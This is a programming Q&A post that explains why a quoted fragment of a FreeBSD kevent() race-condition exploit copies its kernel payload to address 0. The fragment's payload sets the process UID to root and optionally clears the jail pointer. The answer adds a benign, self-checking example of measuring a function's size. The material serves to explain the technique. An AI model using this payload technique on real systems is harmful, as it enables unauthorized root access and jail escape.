I'm reading a piece of code about an exploit here. There is a statement going like this:
/*
FreeBSD <= 6.1 suffers from classical check/use race condition on SMP
systems in kevent() syscall, leading to kernel mode NULL pointer
dereference. It can be triggered by spawning two threads:
1st thread looping on open() and close() syscalls, and the 2nd thread
looping on kevent(), trying to add possibly invalid filedescriptor.
*/
static void kernel_code(void) {
    struct thread *thread;
    gotroot = 1;                    /* global flag declared elsewhere in the exploit */
    asm(
        "movl %%fs:0, %0"           /* curthread, read via the per-CPU segment */
        : "=r"(thread)
    );
    thread->td_proc->p_ucred->cr_uid = 0;
#ifdef PRISON_BREAK
    thread->td_proc->p_ucred->cr_prison = NULL;
#endif
    return;
}
static void code_end(void) {
    return;
}
int main() {
    ....
    memcpy(0, &kernel_code, &code_end - &kernel_code);   /* copy the bytes of kernel_code() to address 0 */
    ....
}
I'm curious what the meaning of this memcpy() is. What is the result of &code_end - &kernel_code?
This assumes that the function kernel_code() will end somewhere before function code_end() starts. The memcpy() therefore copies kernel_code() to address 0. One assumes that some other aspect of the exploit results in a return or jump to address 0, thereby running kernel_code().
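The two-function trick in the question relies on a GNU C extension: standard C does not define subtraction of function pointers, but GCC (and Clang) treat the size of a function as 1, so &code_end - &kernel_code evaluates to the byte distance between the two function entry points, provided the compiler and linker laid them out in source order. The following is an added example, not code from the question or from the exploit it quotes, that makes that byte arithmetic explicit with casts, checks the layout assumption instead of trusting it, and copies the function's bytes into an ordinary buffer rather than to address 0 (which is unmapped in a normal user process). The names payload, payload_end, payload_length and copy_payload are hypothetical stand-ins for kernel_code and code_end.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Two functions written back to back, mirroring kernel_code()/code_end() in
   the question. These are constructed stand-ins, not the exploit's code. */
static int payload_marker = 0;

static void payload(void) {
    payload_marker = 1;
}

static void payload_end(void) {
    /* Its only purpose is to provide an address just past payload(). */
}

/* Byte length of payload(), computed the way "&code_end - &kernel_code" does
   under the GNU extension, but with explicit byte-pointer casts so the
   arithmetic does not depend on the extension. A non-positive result means
   the layout assumption (payload before payload_end) does not hold. */
static ptrdiff_t payload_length(void) {
    return (const unsigned char *)&payload_end - (const unsigned char *)&payload;
}

/* Copy payload()'s machine code into a caller-supplied buffer, the benign
   counterpart of memcpy(0, &kernel_code, ...). Returns the number of bytes
   copied, or -1 if the layout assumption fails or the buffer is too small. */
static ptrdiff_t copy_payload(unsigned char *dst, size_t cap) {
    ptrdiff_t len = payload_length();
    if (len <= 0 || (size_t)len > cap) {
        return -1;
    }
    memcpy(dst, (const void *)&payload, (size_t)len);
    return len;
}

/* Sanity check: the copied bytes must match the original function image. */
static int copy_matches(void) {
    unsigned char buf[4096];
    ptrdiff_t n = copy_payload(buf, sizeof buf);
    if (n < 0) {
        return 0;
    }
    return memcmp(buf, (const void *)&payload, (size_t)n) == 0;
}

int main(void) {
    ptrdiff_t n = payload_length();
    if (n <= 0) {
        printf("layout assumption failed: payload_end is not after payload\n");
        return 1;
    }
    printf("payload() spans %td bytes by the two-function trick\n", n);
    printf("copy matches original: %s\n", copy_matches() ? "yes" : "no");
    return 0;
}
```

The length reported includes whatever alignment padding the compiler inserted after payload()'s final ret, which is why the original exploit can afford to over-copy. Optimizers may also inline, merge or reorder functions, so a build that does not keep payload and payload_end adjacent and in order makes payload_length() return a garbage or negative value; that is the fragility the answer above is pointing at.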